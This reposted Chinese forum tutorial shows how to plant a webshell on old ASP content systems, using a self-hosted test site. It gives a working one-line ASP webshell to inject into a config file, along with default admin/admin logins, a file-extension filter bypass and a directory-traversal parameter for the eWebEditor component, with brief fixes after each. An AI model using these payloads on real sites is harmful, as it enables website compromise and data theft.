两个入侵网站拿WEBSHELL的小技巧（转载）

夜冷风

首先声明，这个技术是很老的。觉得自己NB的就不要看了。我写这个的目的主要是提供给有兴趣的朋友看。

前几日有几个朋友在论坛发求助帖，说在检测网站中遇到一些问题，拿不到WEBSHELL权限。其实不是说这些网站本身的安全设置有多高的，而是这些朋友实在是太依赖工具了。一遇到问题就无法变通了，卡住了，手足无措。还有下次大家不要一问问题就指望我把答案和工具发到某某邮箱，好像我直接给个东西就可以解决，拜托，我不是神仙，我没有那么NB的。我欢迎大家在论坛找我探讨。况且我哪有那么多时间去专门给你发邮件，我也要糊口阿大哥！你抽点时间上网搜一下都懒得么？题外话了哈。
那几个求助帖的问题，我总结一下，今天写个教程。不准备拿那几个可怜的小网站开刀了，自己搭建个测试平台。恩恩，虚拟机Xp系统加IIS，找一个免费的整站程序。目的是模拟网站入侵。一切设置妥当，开工！

打开IE浏览器，输入地址http://www.sb.com/（呵呵，这个是我在hosts文件里自己绑定的域名解析，IP就是虚拟机搭建的网站，虚拟机搭建的网站程序也是我以前整站扒下来的，拿来直接用了），
见图1

出来了，看看，网站貌似不错的样子.找到后台登陆地址，登陆。

见图2


因为不是讲怎样拿到管理员密码用户名，我就不费口舌了。直接输入用户名admin密码admin，顺利登陆后台。呵呵，动易文章系统。

见图3

什么，你看到数据库备份了？呵呵，今天不是讲数据库备份拿WEBSHELL，我就假装看不到它。我们看这里----网站信息配置----- 到这里我讲一下，一部分整站程序都习惯把网站属性配置直接保存到一个名叫config.asp的ASP文件里（有的叫setup.asp或者其他)，而不是直接输入到数据库里。这样做的直接后果就是我们可以在网站属性里直接插入一句话马，轻松拿到WEBSHELL权限。所以我们随便找个栏，插入一句话语句。

见图4图5



这里的语句需要稍稍加加工，改成这样“"%><%execute request ("value")%>'”，（“”不用输入）。其中，“"%>”跟前面的语法形成闭合，以免出错，最后那个“'”主要作用是注释掉后面的其他语句（会点编程的人都应该知道，“'”就是注释的意思，后面的语句不会随程序执行的）。
输入完毕后保存，刷新一下。呵呵，出现错误提示。

错误类型：
Microsoft VBScript 运行时错误 (0x800A000D)
类型不匹配: 'execute'
/inc/config.asp, 第 4 行

见图6


呵呵，看见没？配置文件路径出来了，/inc/config.asp，也就是http://www.sb.com/inc/config.asp。出现这个错误提示，表明我们的一句话已经写入成功。拿一句话客户端程序连下试试，把地址写到程序里然后连接，呵呵，一切OK，你要写个大马也行。到此，WEBSHELL已经顺利拿到手。

见图7图8图9




简单说下如何修补这个漏洞。
办法一：如果你有服务器的系统权限，可以设置WEB文件夹的访问权限，限制Internet来宾用户修改权限（当然了，数据库目录和上传目录不能限制，不然会出错）。这样，就算他想修改也无能无力了。
办法二：如果你没有服务器的系统权限，只是租借虚拟空间，那么要么你向虚拟空间服务商求助，要么更换程序。据我了解，这种漏洞只存在一些比较老的免费整站系统，新点的整站系统都没有这个问题了。


见图10


再来讲另外一个小漏洞。

我们来看这个地址

见图11

http://www.sb.com/3/admin_login.asp

eWebSoft在线文本编辑器，很多站都有这个免费程序。而且很多人连默认密码都懒得改，我们基本上可以直接登陆
用户名admin密码admin
如果登陆不上，你还可以找找它的默认数据库地址，一般都没改的。\db\eWebEditor.mdb
下载回来找个MD5破解的,就可以得到密码了.
进来后看这里----样式管理
随便找一个样式,如果不允许修改默认的,就拷贝一个再修改.
直接在图片类型后添加后缀ASA或者CER类型.然后点预览,就可以直接上传你的ASA或者CER后缀的WEBSHELL马了.
见图12


简单看看原因:
源代码的漏洞语句: sAllowExt = Replace(UCase(sAllowExt), "ASP", "")
就过滤了asp后缀，真是~~~，就算你过滤了ASp，我只需添加个aaspsp就可以上传asp文件了。

简单说下如何修补这个漏洞。
我懒得去改代码，直接把数据库eWebEditor.mdb设置为只读。看你怎么办！嘿嘿！

有防就用攻，如果数据库eWebEditor.mdb为只读，我们没有修改图片类型的时候，我们还可以使用另外一个漏洞，遍历目录。

看这里，假设上传目录是uploadfile，我们只需要在后面加上&dir=../../

就可以往上跳转了，呵呵，基本上你可以看到网站的所有文件路径。还等什么，找数据库和后台地址呗。
就算数据库为只读一样可以用的。

见图13


简单说下如何修补这个漏洞。

像修改代码，该数据库名这样的麻烦办法不说了，我们可以直接把管理员密码用户名设置复杂点，让他死活也破不出来，呵呵，这样就OK了。简单吧！